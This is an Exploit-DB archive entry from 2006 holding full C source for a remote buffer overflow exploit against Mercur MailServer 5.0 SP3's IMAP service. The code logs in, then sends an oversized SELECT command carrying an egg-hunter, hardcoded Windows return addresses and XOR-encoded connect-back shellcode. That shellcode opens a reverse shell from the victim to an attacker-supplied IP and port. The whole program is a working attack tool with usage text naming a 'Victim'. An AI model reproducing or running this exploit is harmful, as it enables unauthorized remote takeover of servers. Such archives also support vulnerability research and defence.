Mercur MailServer 5.0 SP3 - 'IMAP' Remote Buffer Overflow (1)

EDB-ID:

1592


Author:

pLL

Type:

remote


Platform:

Windows

Date:

2006-03-19


/*
 * mercur.cpp
 *
 * Atrium Mercur IMAP 5.0 SP3 Messaging Multiple IMAP Commands Remote Exploit
 * Copyright (C) 2006 Javaphile Group
 * http://www.javaphile.org
 *
 * Exploits code by : pll Ellison.Tang[at]gmail[dot]com
 *
 * Bug Reference:
 * http://www.frsirt.com/bulletins/4332
 *
 */

#include <stdio.h>
#include <time.h>
#include <stdlib.h>
#include <winsock2.h>

#pragma comment(lib, "ws2_32")

SOCKET ConnectTo(char *ip, int port)
{
	WSADATA	wsaData;
	SOCKET	s;
	struct	hostent		*he;
	struct	sockaddr_in	host;
	int		nTimeout=150000;

	if(WSAStartup(MAKEWORD(1,1),&wsaData)!=0)
	{
		printf("[-]WSAStartup failed.\n");
		exit(-1);
	}

	if((he=gethostbyname(ip))==0)
	{
		printf("[-]Failed to resolve '%s'.", ip);
		exit(-1);
	}

	host.sin_port=htons(port);
	host.sin_family=AF_INET;
	host.sin_addr=*((struct in_addr *)he->h_addr);

	if ((s=socket(AF_INET,SOCK_STREAM,0))<0)
	{
		printf("[-]Failed creating socket.");
 		exit(-1);
 	}

	if ((connect(s,(struct sockaddr *)&host,sizeof(host)))==-1)
	{
		closesocket(s);
		printf("[-]Failed connecting to host.\n");
		exit(-1);
	}
	setsockopt(s,SOL_SOCKET,SO_RCVTIMEO,(char*)&nTimeout,sizeof(nTimeout));
	return s;
}


void Disconnect(SOCKET s)
{
	closesocket(s);
	WSACleanup();
}

void PrintSc(unsigned char *sc, int len)
{
    int    i,j;
    char *p;
    char msg[6];

    //printf("/* %d bytes */\n", buffsize);

    // Print general shellcode
    for(i = 0; i < len; i++)
    {
        if((i%16)==0)
        {
            if(i!=0)
                printf("\"\n\"");
            else
                printf("\"");
        }

        //printf("\\x%.2X", sc[i]);

        sprintf(msg, "\\x%.2X", sc[i] & 0xff);

        for( p = msg, j=0; j < 4; p++, j++ )
        {
            if(isupper(*p))
                printf("%c", _tolower(*p));
            else
                printf("%c", p[0]);
        }
    }

    printf("\";\n");
}

void main(int argc,char* argv[])
{

	struct OSTYPE
	{
		unsigned int ret;
		char des[255];
	};

	OSTYPE os[] = {
		{0x7FFA4512, "CN Windows ALL 0x7FFA4512"},
		{0x7801f4fb, "Windows 2k SP4 0x7801f4fb"},
		{0xDDDDDDDD, "Debug"},
		{0, NULL}
	};

	unsigned char shellcode[]=
	/* ip offset: 71 + 21 = 92 */
	/* port offset: 78 + 21 = 99 */
	/* 21 bytes decode */
	"\xeb\x0e\x5b\x4b\x33\xc9\xb1\xfe\x80\x34\x0b\xee\xe2\xfa\xeb\x05"
	"\xe8\xed\xff\xff\xff"
	/* 254 bytes shellcode, xor with 0xee */
	"\x07\x36\xee\xee\xee\xb1\x8a\x4f\xde\xee\xee\xee\x65\xae\xe2\x65"
	"\x9e\xf2\x43\x65\x86\xe6\x65\x19\x84\xea\xb7\x06\x96\xee\xee\xee"
	"\x0c\x17\x86\xdd\xdc\xee\xee\x86\x99\x9d\xdc\xb1\xba\x11\xf8\x7b"
	"\x84\xed\xb7\x06\x8e\xee\xee\xee\x0c\x17\xbf\xbf\xbf\xbf\x84\xef"
	"\x84\xec\x11\xb8\xfe\x7d\x86"
	"\x91\xee\xee\xef"				//ip
	"\x86"
	"\xec\xee"
	"\xee\xdb"						//port
	"\x65\x02\x84\xfe\xbb\xbd\x11\xb8\xfa\x6b\x2e\x9b\xd6\x65\x12\x84"
	"\xfc\xb7\x45\x0c\x13\x88\x29\xaa\xca\xd2\xef\xef\x7d\x45\x45\x45"
	"\x65\x12\x86\x8d\x83\x8a\xee\x65\x02\xbe\x63\xa9\xfe\xb9\xbe\xbf"
	"\xbf\xbf\x84\xef\xbf\xbf\xbb\xbf\x11\xb8\xea\x84\x11\x11\xd9\x11"
	"\xb8\xe2\x11\xb8\xf6\x11\xb8\xe6\xbf\xb8\x65\x9b\xd2\x65\x9a\xc0"
	"\x96\xed\x1b\xb8\x65\x98\xce\xed\x1b\xdd\x27\xa7\xaf\x43\xed\x2b"
	"\xdd\x35\xe1\x50\xfe\xd4\x38\x9a\xe6\x2f\x25\xe3\xed\x34\xae\x05"
	"\x1f\xd5\xf1\x9b\x09\xb0\x65\xb0\xca\xed\x33\x88\x65\xe2\xa5\x65"
	"\xb0\xf2\xed\x33\x65\xea\x65\xed\x2b\x45\xb0\xb7\x2d\x06\xcd\x11"
	"\x11\x11\x60\xa0\xe0\x02\x9c\x10\x5d\xf8\x01\x20\x0e\x8e\x43\x37"
	"\xeb\x20\x37\xe7\x1b\x43\x02\x17\x44\x8e\x09\x97\x28\x97";

	unsigned char FindSc[]=
	"\x8B\xCC\x80\xE9\x3E\x8B\xF1\x33\xC0\x40\xC1\xE0\x0A\x04\x80\x8B"
	"\xF8\x57\x33\xC9\xB1\x3E\xF3\xA4\x5F\xFF\xE7\x8B\xC7\x04\x28\x50"
	"\x33\xC0\x50\x64\x89\x20\xBA\x41\x47\x4F\x55\x33\xFF\x3B\x17\x74"
	"\x03\x47\xEB\xF9\x83\xC7\x04\x3B\x17\x74\x03\x47\xEB\xEF\x83\xC7"
	"\x04\x57\xC3\x8B\x54\x24\x0C\x33\xC0\xB4\x10\x33\xDB\xB3\x9C\x01"
	"\x04\x13\x33\xC0\xC3"
	"\x90\x90\x90\x90"
	"\xEB\xA5";


	if(argc < 5)
	{
		printf("Mercur IMAPD 5.0 SP3 Remote Exploit\n");
		printf("-------------------------------------------\n");
		printf("Usage:\n");
		printf("   %s <Victim> <Connect back IP> <Connect back Port> <OsType>\n", argv[0]);
		printf("\nType could be:\n");

		int i=0;
		while(os[i].ret)
		{
			printf(" [%d]  %s\n", i, os[i].des);
			i++;
		}
		return;
	}

	SOCKET	s=ConnectTo(argv[1],143);

	printf("[+]Connected to target...");

	char szRecvBuff[600] = {0};

	if(recv(s,szRecvBuff,sizeof(szRecvBuff),0)<=0)
	{
		printf("failed!\n");
		return;
	}
	else
	{
		printf("done!\n");
	}

//	printf("%s\n",szRecvBuff);

	if(strstr(szRecvBuff, "MERCUR") == NULL)
	{
		printf("[-]Seems not IMAP running.\n");
		printf("Quiting...");
		return;
	}
	else
	{
		printf("[*]Seems IMAP running.\n");
	}

	unsigned long dwCbIp=inet_addr(argv[2]);

	unsigned short q=(unsigned short)atoi(argv[3]);
	unsigned short dwCbPort=(unsigned short)q;

	dwCbIp=dwCbIp^0xEEEEEEEE;
	dwCbPort=dwCbPort^0xEEEE;

	shellcode[92] =(char) (dwCbIp & 0x000000FF);
	shellcode[93] =(char) ((dwCbIp & 0x0000FF00)>>8);
	shellcode[94] =(char) ((dwCbIp & 0x00FF0000)>>16);
	shellcode[95] =(char) ((dwCbIp & 0xFF000000)>>24);

	shellcode[99] =(char) ((dwCbPort & 0x0000FF00)>>8);
	shellcode[100] =(char) (dwCbPort & 0x000000FF);

	char	szUserName[20]={0};
	printf("[?]Username:");
	gets(szUserName);

	char	szPassWord[20]={0};
	printf("[?]Passwd:");
	gets(szPassWord);

	char	szLogin[]=" login ";
	char	szLoginInfo[50]={0};
	unsigned char	szSpace=0x20;
	char szEnd[]="\r\n";

	memcpy(szLoginInfo,szUserName,lstrlen(szUserName));
	int		dwLen=lstrlen(szUserName);
	memcpy(szLoginInfo+dwLen,szLogin,lstrlen(szLogin));
	dwLen+=lstrlen(szLogin);
	memcpy(szLoginInfo+dwLen,szPassWord,lstrlen(szPassWord));
	dwLen+=lstrlen(szPassWord);
	memcpy(szLoginInfo+dwLen,&szSpace,1);
	dwLen++;
	memcpy(szLoginInfo+dwLen,szPassWord,lstrlen(szPassWord));
	dwLen+=lstrlen(szPassWord);
	memcpy(szLoginInfo+dwLen,szEnd,lstrlen(szEnd));

//	printf("%s\n",szLoginInfo);

	printf("[+]Sending Login Info...");

	send(s,szLoginInfo,lstrlen(szLoginInfo),0);

	if(recv(s,szRecvBuff,sizeof(szRecvBuff),0)<=0)
	{
		printf("failed!\n");
		return;
	}
	else
	{
		printf("done!\n");
	}

//	printf("%s\n",szRecvBuff);

	if(strstr(szRecvBuff, "OK") == NULL)
	{
		printf("[-]Seems not a valid user or not support IMAP.\n");
		printf("Quiting...");
		return;
	}
	else
	{
		printf("[*]Seems a valid user.\n");
	}

	char	szSelect[]=" select ";
	char	szMagicData[1000]={0};

	memset(szMagicData,'A',sizeof(szMagicData)-1);
	memcpy(szMagicData,szUserName,lstrlen(szUserName));
	memcpy(szMagicData+lstrlen(szUserName),szSelect,sizeof szSelect-1);

	int p=atoi(argv[4]);
	*(unsigned int *)&FindSc[85] = os[p].ret;

	memcpy(szMagicData+251-sizeof FindSc+1,FindSc,sizeof FindSc-1);

	memcpy(szMagicData+251,szEnd,sizeof szEnd-1);

	char	szAdog[]="AGOU";
	memcpy(szMagicData+253,szAdog,sizeof szAdog-1);
	memcpy(szMagicData+257,szAdog,sizeof szAdog-1);
	memcpy(szMagicData+261,shellcode,sizeof shellcode-1);

	memcpy(szMagicData+sizeof szMagicData-sizeof szEnd,szEnd,sizeof szEnd-1);

	printf("[+]Sending Magic Data To server...Good Luck!\n");
	send(s,szMagicData,sizeof szMagicData-1,0);

	recv(s,szRecvBuff,sizeof(szRecvBuff),0);
	printf("%s\n",szRecvBuff);

	Disconnect(s);
	printf("[?]Sending finished...Good luck!\n");
}

// milw0rm.com [2006-03-19]